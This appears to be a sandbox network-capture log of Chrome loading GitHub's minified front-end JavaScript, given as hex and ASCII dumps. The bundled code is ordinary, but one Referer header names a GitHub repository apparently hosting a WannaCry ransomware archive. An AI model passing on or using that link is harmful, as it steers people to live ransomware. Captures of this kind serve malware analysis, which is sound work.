                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_query-builder-element_query-builder-element_ts"],{55399:(t,e,i)=>{i.d(e,{dy:()=>l.dy,sY:()=>l.sY,Au:()=>l.Au});var s=i(47940),a=i(50655);let n="jtml-no-op",r=s.ZO.creat
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 72 6b 22 2c 74 2e 42 72 61 6e 63 68 3d 22 62 72 61 6e 63 68 22 2c 74 2e 43 61 6c 65 6e 64 61 72 3d 22 63 61 6c 65 6e 64 61 72 22 2c 74 2e 43 69 72 63 6c 65 3d 22 63 69 72 63 6c 65 22 2c 74 2e 43 6f 64 65 3d 22 63 6f 64 65 22 2c 74 2e 43 6f 64 65 52 65 76 69 65 77 3d 22 63 6f 64 65 2d 72 65 76 69 65 77 22 2c 74 2e 43 6f 64 65 53 71 75 61 72 65 3d 22 63 6f 64 65 2d 73 71 75 61 72 65 22 2c 74 2e 43 6f 6d 6d 65 6e 74 3d 22 63 6f 6d 6d 65 6e 74 22 2c 74 2e 43 6f 6d 6d 65 6e 74 44 69 73 63 75 73 73 69 6f 6e 3d 22 63 6f 6d 6d 65 6e 74 2d 64 69 73 63 75 73 73 69 6f 6e 22 2c 74 2e 43 6f 70 69 6c 6f 74 3d 22 63 6f 70 69 6c 6f 74 22 2c 74 2e 43 6f 64 65 73 70 61 63 65 73 3d 22 63 6f 64 65 73 70 61 63 65 73 22 2c 74 2e 43 72 65 64 69 74 43 61 72 64 3d 22 63 72 65 64
                                                                                      Data Ascii: rk",t.Branch="branch",t.Calendar="calendar",t.Circle="circle",t.Code="code",t.CodeReview="code-review",t.CodeSquare="code-square",t.Comment="comment",t.CommentDiscussion="comment-discussion",t.Copilot="copilot",t.Codespaces="codespaces",t.CreditCard="cred
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 67 3d 22 2d 2d 63 6f 6c 6f 72 2d 70 72 65 74 74 79 6c 69 67 68 74 73 2d 73 79 6e 74 61 78 2d 73 74 72 69 6e 67 22 7d 28 6e 7c 7c 28 6e 3d 7b 7d 29 29 3b 6c 65 74 20 53 65 61 72 63 68 49 74 65 6d 3d 63 6c 61 73 73 20 53 65 61 72 63 68 49 74 65 6d 20 65 78 74 65 6e 64 73 20 45 76 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 7b 70 72 69 6f 72 69 74 79 3a 74 2c 76 61 6c 75 65 3a 65 2c 61 63 74 69 6f 6e 3a 69 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 73 3d 22 22 2c 69 63 6f 6e 3a 61 2c 73 63 6f 70 65 3a 6e 3d 22 44 45 46 41 55 4c 54 22 2c 70 72 65 66 69 78 54 65 78 74 3a 72 2c 70 72 65 66 69 78 43 6f 6c 6f 72 3a 6c 2c 69 73 46 61 6c 6c 62 61 63 6b 53 75 67 67 65 73 74 69 6f 6e 3a 6f 7d 29 7b 73 75 70 65 72 28 22 73 65 61 72 63 68 2d 69 74 65 6d 22 29 2c 74 68
                                                                                      Data Ascii: g="--color-prettylights-syntax-string"}(n||(n={}));let SearchItem=class SearchItem extends Event{constructor({priority:t,value:e,action:i,description:s="",icon:a,scope:n="DEFAULT",prefixText:r,prefixColor:l,isFallbackSuggestion:o}){super("search-item"),th
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 2e 68 61 73 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 22 2b 69 2b 22 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 2c 65 29 7b 76 61 72 20 69 3d 4b 28 74 2c 65 2c 22 67 65 74 22 29 3b 72 65 74 75 72 6e 20 69 2e 67 65 74 3f 69 2e 67 65 74 2e 63 61 6c 6c 28 74 29 3a 69 2e 76 61 6c 75 65 7d 66 75 6e 63 74 69 6f 6e 20 47 28 74 2c 65 2c 69 29 7b 4e 28 74 2c 65 29 2c 65 2e 73 65 74 28 74 2c 69 29 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 2c 65 2c 69 29 7b 76 61 72 20 73 3d 4b 28 74 2c 65 2c 22 73 65 74 22 29 3b 72 65 74 75 72 6e 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65
                                                                                      Data Ascii: e.has(t))throw TypeError("attempted to "+i+" private field on non-instance");return e.get(t)}function _(t,e){var i=K(t,e,"get");return i.get?i.get.call(t):i.value}function G(t,e,i){N(t,e),e.set(t,i)}function H(t,e,i){var s=K(t,e,"set");return!function(t,e
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 4d 61 70 2c 41 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 6b 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 43 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 45 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 53 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 78 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 57 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 50 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 46 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 4d 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 71 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 54 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 52 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 51 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 42 3d 6e 65 77 20 57 65 61 6b 53 65 74 2c 63 6c 61 73 73 20 51 75 65 72 79 42 75 69 6c 64 65 72 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 48 54 4d 4c 45 6c 65
                                                                                      Data Ascii: Map,A=new WeakMap,k=new WeakMap,C=new WeakSet,E=new WeakSet,S=new WeakSet,x=new WeakSet,W=new WeakSet,P=new WeakSet,F=new WeakSet,M=new WeakSet,q=new WeakSet,T=new WeakSet,R=new WeakSet,Q=new WeakSet,B=new WeakSet,class QueryBuilderElement extends HTMLEle
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6e 3d 21 31 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 7d 7d 73 68 6f 77 28 29 7b 74 68 69 73 2e 63 6c 6f 73 65 64 3d 21 31 2c 74 68 69 73 2e 6f 76 65 72 6c 61 79 3f 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 3f 2e 28 7b 62 65 68 61 76 69 6f 72 3a 22 73 6d 6f 6f 74 68 22 2c 62 6c 6f 63 6b 3a 22 6e 65 61 72 65 73 74 22 7d 29 7d 68 69 64 65 28 29 7b 22 66 61 6c 73 65 22 3d 3d 3d 74 68 69 73 2e 72 65 73 75 6c 74 73 4c 69 73 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 70 65 72 73 69 73 74 2d 6c 69 73 74 22 29 26 26 28 74 68 69 73 2e 63 6c 6f 73 65 64 3d 21 30 29 7d 69 6e 69 74 69 61 6c 69 7a 65 28 74 2c 65 29 7b 66 6f 72 28 6c 65 74 20
                                                                                      Data Ascii: n=!1),this.input.setAttribute("aria-expanded","true")}}show(){this.closed=!1,this.overlay?.scrollIntoView?.({behavior:"smooth",block:"nearest"})}hide(){"false"===this.resultsList.getAttribute("data-persist-list")&&(this.closed=!0)}initialize(t,e){for(let
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 2e 70 61 72 73 65 64 4d 65 74 61 64 61 74 61 3d 74 68 69 73 2e 70 61 72 73 65 72 2e 70 61 72 73 65 28 74 68 69 73 2e 69 6e 70 75 74 2e 76 61 6c 75 65 2c 74 68 69 73 2e 69 6e 70 75 74 2e 73 65 6c 65 63 74 69 6f 6e 53 74 61 72 74 7c 7c 30 29 2c 74 68 69 73 2e 70 61 72 73 65 72 2e 66 6c 61 74 74 65 6e 28 74 68 69 73 2e 70 61 72 73 65 64 4d 65 74 61 64 61 74 61 29 7d 61 74 74 61 63 68 50 72 6f 76 69 64 65 72 28 74 29 7b 69 66 28 21 5f 28 74 68 69 73 2c 6f 29 29 72 65 74 75 72 6e 3b 6c 65 74 7b 73 69 67 6e 61 6c 3a 65 7d 3d 5f 28 74 68 69 73 2c 6f 29 3b 69 66 28 21 5f 28 74 68 69 73 2c 77 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 27 74 20 61 74 74 61 63 68 20 70 72 6f 76 69 64 65 72 73 20 61 66 74 65 72 20 74 68 65 20 71 75 65 72 79 20 62 75 69 6c
                                                                                      Data Ascii: .parsedMetadata=this.parser.parse(this.input.value,this.input.selectionStart||0),this.parser.flatten(this.parsedMetadata)}attachProvider(t){if(!_(this,o))return;let{signal:e}=_(this,o);if(!_(this,w))throw Error("Can't attach providers after the query buil
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 74 29 7b 6c 65 74 20 65 3d 74 2e 74 61 72 67 65 74 2c 69 3d 65 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 79 70 65 22 29 2c 73 3d 65 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 76 61 6c 75 65 22 29 7c 7c 22 22 2c 61 3d 65 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 72 65 70 6c 61 63 65 2d 71 75 65 72 79 2d 77 69 74 68 22 29 7c 7c 22 22 2c 6e 3d 70 61 72 73 65 49 6e 74 28 65 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 6f 76 65 2d 63 61 72 65 74 2d 74 6f 22 29 7c 7c 22 30 22 29 7c 7c 30 2c 72 3d 74 68 69 73 2e 70 61 72 73 65 49 6e 70 75 74 56 61 6c 75 65 28 29 3b 69 66 28 22 75 72 6c 2d 72 65 73 75 6c 74 22 3d 3d 3d 69 29 3b 65 6c 73 65 20 69 66 28 22 66 69 6c 74 65 72 2d 72
                                                                                      Data Ascii: t){let e=t.target,i=e?.getAttribute("data-type"),s=e?.getAttribute("data-value")||"",a=e?.getAttribute("data-replace-query-with")||"",n=parseInt(e?.getAttribute("data-move-caret-to")||"0")||0,r=this.parseInputValue();if("url-result"===i);else if("filter-r
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 64 65 28 29 7d 72 65 73 75 6c 74 73 4d 6f 75 73 65 64 6f 77 6e 28 29 7b 48 28 74 68 69 73 2c 61 2c 21 30 29 7d 61 73 79 6e 63 20 69 6e 70 75 74 46 6f 63 75 73 28 29 7b 74 68 69 73 2e 73 74 79 6c 65 64 49 6e 70 75 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 5f 28 74 68 69 73 2c 6d 29 29 2c 74 68 69 73 2e 72 65 61 64 79 46 6f 72 52 65 71 75 65 73 74 50 72 6f 76 69 64 65 72 73 28 29 2c 5f 28 74 68 69 73 2c 73 29 2e 73 74 61 72 74 28 29 3b 6c 65 74 20 74 3d 74 68 69 73 2e 69 6e 70 75 74 2e 76 61 6c 75 65 3b 74 68 69 73 2e 6c 61 73 74 50 61 72 73 65 64 51 75 65 72 79 26 26 74 68 69 73 2e 6c 61 73 74 50 61 72 73 65 64 51 75 65 72 79 3d 3d 3d 74 68 69 73 2e 69 6e 70 75 74 2e 76 61 6c 75 65 7c 7c 61 77 61 69 74 20 74 68 69 73 2e 70 61 72 73 65 51 75 65 72 79
                                                                                      Data Ascii: de()}resultsMousedown(){H(this,a,!0)}async inputFocus(){this.styledInput.classList.add(_(this,m)),this.readyForRequestProviders(),_(this,s).start();let t=this.input.value;this.lastParsedQuery&&this.lastParsedQuery===this.input.value||await this.parseQuery
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 6d 61 6c 6c 22 3a 22 61 76 61 74 61 72 20 61 76 61 74 61 72 2d 31 20 61 76 61 74 61 72 2d 73 6d 61 6c 6c 20 63 69 72 63 6c 65 22 3b 72 65 74 75 72 6e 28 30 2c 6a 2e 64 79 29 60 3c 69 6d 67 20 73 72 63 3d 22 24 7b 65 2e 75 72 6c 7d 22 20 61 6c 74 3d 22 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 24 7b 74 7d 22 20 2f 3e 60 7d 69 66 28 74 26 26 28 30 2c 7a 2e 4a 75 29 28 74 29 29 72 65 74 75 72 6e 28 30 2c 6a 2e 64 79 29 28 5b 74 2e 68 74 6d 6c 5d 29 3b 6c 65 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 60 24 7b 74 7d 2d 69 63 6f 6e 60 29 3b 72 65 74 75 72 6e 28 30 2c 6a 2e 64 79 29 28 5b 69 3f 2e 69 6e 6e 65 72 48 54 4d 4c 5d 29 7d 75 70 64 61 74 65 53 63 72 65 65 6e 52 65
                                                                                      Data Ascii: small":"avatar avatar-1 avatar-small circle";return(0,j.dy)`<img src="${e.url}" alt="" role="presentation" class="${t}" />`}if(t&&(0,z.Ju)(t))return(0,j.dy)([t.html]);let i=document.getElementById(`${t}-icon`);return(0,j.dy)([i?.innerHTML])}updateScreenRe


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      83192.168.2.1649789185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC742OUTGET /assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1-5c4d940a245a.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 17614
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 28 Feb 2024 13:59:19 GMT
                                                                                      ETag: 0x8DC386575644A92
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2069263
                                                                                      X-Served-By: cache-iad-kcgs7200077-IAD, cache-lga21941-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 398, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 36d6f93c38601909bb06c47c2e6c03424831c95c
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 74 72 75 73 74 65 64 2d 74 79 70 65 73 2d 70 6f 6c 69 63 69 65 73 5f 70 6f 6c 69 63 79 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 5f 74 72 75 73 74 65 64 2d 74 79 70 65 73 5f 74 72 75 73 74 65 64 2d 74 79 70 65 73 5f 74 73 2d 6e 6f 64 65 5f 2d 33 38 66 38 66 31 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 64 69 73 74 5f 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 6a 73 2d 6e
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1","vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-n
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 28 74 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 69 3f 2e 73 65 6e 64 50 61 67 65 56 69 65 77 28 64 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 3d 7b 7d 29 7b 6c 65 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6d 65 74 61 5b 6e 61 6d 65 3d 22 63 75 72 72 65 6e 74 2d 63 61 74 61 6c 6f 67 2d 73 65 72 76 69 63 65 22 5d 27 29 3f 2e 63 6f 6e 74 65 6e 74 2c 72 3d 6e 3f 7b 73 65 72 76 69 63 65 3a 6e 7d 3a 7b 7d 3b 66 6f 72 28 6c 65 74 5b 65 2c 6e 5d 6f 66 20 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 29 6e 75 6c 6c 21 3d 6e 26 26 28 72 5b 65 5d 3d 60 24 7b 6e 7d 60 29 3b 69 66 28 69 29 7b 6c 65 74 20 74 3d 65 7c 7c 22 75 6e 6b 6e 6f 77 6e 22 3b 64 28 72 29 2c 69 2e 73 65 6e
                                                                                      Data Ascii: (t,e)}function p(e){i?.sendPageView(d(e))}function h(e,t={}){let n=document.head?.querySelector('meta[name="current-catalog-service"]')?.content,r=n?{service:n}:{};for(let[e,n]of Object.entries(t))null!=n&&(r[e]=`${n}`);if(i){let t=e||"unknown";d(r),i.sen
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 29 29 74 68 72 6f 77 20 65 7d 72 65 74 75 72 6e 20 6e 7d 7d 7d 2c 34 37 39 34 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 4f 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 69 2c 72 3d 6e 28 37 31 32 30 37 29 2c 73 3d 6e 28 34 33 37 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 28 29 3d 3e 7b 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 60 54 68 65 20 70 6f 6c 69 63 79 20 64 6f 65 73 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 20 74 68 65 20 66 75 6e 63 74 69 6f 6e 20 24 7b 65 7d 60 29 7d 7d 6c 65 74 20 61 3d 7b 63 72 65 61 74 65 48 54 4d 4c 3a 6f 28 22 63 72 65 61 74 65 48 54 4d 4c 22 29 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 6f 28 22 63 72 65 61 74 65 53 63 72 69 70 74 22 29 2c 63 72 65 61 74 65 53 63 72 69 70 74 55
                                                                                      Data Ascii: ))throw e}return n}}},47940:(e,t,n)=>{n.d(t,{ZO:()=>u});var i,r=n(71207),s=n(43786);function o(e){return()=>{throw TypeError(`The policy does not implement the function ${e}`)}}let a={createHTML:o("createHTML"),createScript:o("createScript"),createScriptU
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 69 6e 70 75 74 3d 65 2c 74 68 69 73 2e 6c 69 73 74 3d 74 2c 74 68 69 73 2e 74 61 62 49 6e 73 65 72 74 73 53 75 67 67 65 73 74 69 6f 6e 73 3d 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 2c 74 68 69 73 2e 66 69 72 73 74 4f 70 74 69 6f 6e 53 65 6c 65 63 74 69 6f 6e 4d 6f 64 65 3d 6e 75 6c 6c 21 3d 69 3f 69 3a 22 6e 6f 6e 65 22 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 4f 70 74 69 6f 6e 73 3d 6e 75 6c 6c 21 3d 73 3f 73 3a 7b 62 6c 6f 63 6b 3a 22 6e 65 61 72 65 73 74 22 2c 69 6e 6c 69 6e 65 3a 22 6e 65 61 72 65 73 74 22 7d 2c 74 68 69 73 2e 69 73 43 6f 6d 70 6f 73 69 6e 67 3d 21 31 2c 74 2e 69 64 7c 7c 28 74 2e 69 64 3d 60 63 6f 6d 62 6f 62 6f 78 2d 24 7b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 2e 73 6c 69 63 65 28 32 2c 36
                                                                                      Data Ascii: input=e,this.list=t,this.tabInsertsSuggestions=null==n||n,this.firstOptionSelectionMode=null!=i?i:"none",this.scrollIntoViewOptions=null!=s?s:{block:"nearest",inline:"nearest"},this.isComposing=!1,t.id||(t.id=`combobox-${Math.random().toString().slice(2,6
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 70 22 2c 22 6c 69 73 74 62 6f 78 22 29 7d 64 65 73 74 72 6f 79 28 29 7b 74 68 69 73 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 28 29 2c 74 68 69 73 2e 73 74 6f 70 28 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65
                                                                                      Data Ascii: p","listbox")}destroy(){this.clearSelection(),this.stop(),this.input.removeAttribute("role"),this.input.removeAttribute("aria-controls"),this.input.removeAttribute("aria-expanded"),this.input.removeAttribute("aria-autocomplete"),this.input.removeAttribute
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 61 74 65 28 65 3d 31 29 7b 6c 65 74 20 74 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6c 69 73 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 22 74 72 75 65 22 5d 27 29 29 2e 66 69 6c 74 65 72 28 73 29 5b 30 5d 2c 6e 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6c 69 73 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 5d 27 29 29 2e 66 69 6c 74 65 72 28 73 29 2c 69 3d 6e 2e 69 6e 64 65 78 4f 66 28 74 29 3b 69 66 28 69 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 2d 31 26 26 31 3d 3d 3d 65 7c 7c 30 3d 3d 3d 69 26 26 2d 31 3d 3d 3d 65 29 7b 74 68 69 73 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 28 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 66 6f 63
                                                                                      Data Ascii: ate(e=1){let t=Array.from(this.list.querySelectorAll('[aria-selected="true"]')).filter(s)[0],n=Array.from(this.list.querySelectorAll('[role="option"]')).filter(s),i=n.indexOf(t);if(i===n.length-1&&1===e||0===i&&-1===e){this.clearSelection(),this.input.foc
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 29 7c 7c 28 6e 2e 63 6c 69 63 6b 28 29 2c 21 30 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 21 65 2e 68 69 64 64 65 6e 26 26 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 26 26 22 68 69 64 64 65 6e 22 3d 3d 3d 65 2e 74 79 70 65 29 26 26 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 3e 30 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3e 30 29 7d 7d 2c 38 36 30 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 52 3a 28 29 3d 3e 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 7d 29 3b 76 61 72 20 69 3d 6e 28 38 32 39 31 38 29 3b 6c 65 74 20 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 3d 63 6c 61 73 73 20 41
                                                                                      Data Ascii: Attribute("aria-disabled")||(n.click(),!0))}function s(e){return!e.hidden&&!(e instanceof HTMLInputElement&&"hidden"===e.type)&&(e.offsetWidth>0||e.offsetHeight>0)}},86058:(e,t,n)=>{n.d(t,{R:()=>AnalyticsClient});var i=n(82918);let AnalyticsClient=class A
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6e 75 6c 6c 21 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 6e 75 6c 6c 21 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 2c 60 24 7b 74 7d 78 24 7b 65 7d 60 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 22 75 6e 6b 6e 6f 77 6e 22 7d 7d 28 29 2c 62 72 6f 77 73 65 72 5f 6c 61 6e 67 75 61 67 65 73 3a 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3f 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 2e 6a 6f 69 6e 28 22 2c 22 29 3a 6e 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 7c 7c 22 22 2c 70 69 78 65 6c 5f 72 61 74 69
                                                                                      Data Ascii: null!=document.body&&null!=document.body.clientWidth&&(t=document.body.clientWidth,e=document.body.clientHeight),`${t}x${e}`}catch(e){return"unknown"}}(),browser_languages:navigator.languages?navigator.languages.join(","):navigator.language||"",pixel_rati
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 2c 73 74 61 72 74 3a 72 2c 65 6e 64 3a 69 2b 32 2c 76 61 6c 75 65 3a 65 2e 73 6c 69 63 65 28 6e 2b 32 2c 69 29 2e 74 72 69 6d 28 29 7d 29 29 2c 69 2b 3d 31 2c 6e 3d 69 2b 31 29 7d 72 65 74 75 72 6e 20 6e 3c 74 26 26 6f 2e 70 75 73 68 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 73 74 61 72 74 3a 6e 2c 65 6e 64 3a 74 2c 76 61 6c 75 65 3a 65 2e 73 6c 69 63 65 28 6e 2c 74 29 7d 29 29 2c 69 2e 73 65 74 28 65 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 6f 29 29 2c 69 2e 67 65 74 28 65 29 7d 6c 65 74 20 73 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 6f 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 41 74 74 72 69 62 75 74 65 54 65 6d 70 6c 61 74 65 50 61 72 74 3d 63 6c 61 73 73 20 41 74 74 72 69 62 75 74 65 54 65
                                                                                      Data Ascii: ",start:r,end:i+2,value:e.slice(n+2,i).trim()})),i+=1,n=i+1)}return n<t&&o.push(Object.freeze({type:"string",start:n,end:t,value:e.slice(n,t)})),i.set(e,Object.freeze(o)),i.get(e)}let s=new WeakMap,o=new WeakMap;let AttributeTemplatePart=class AttributeTe
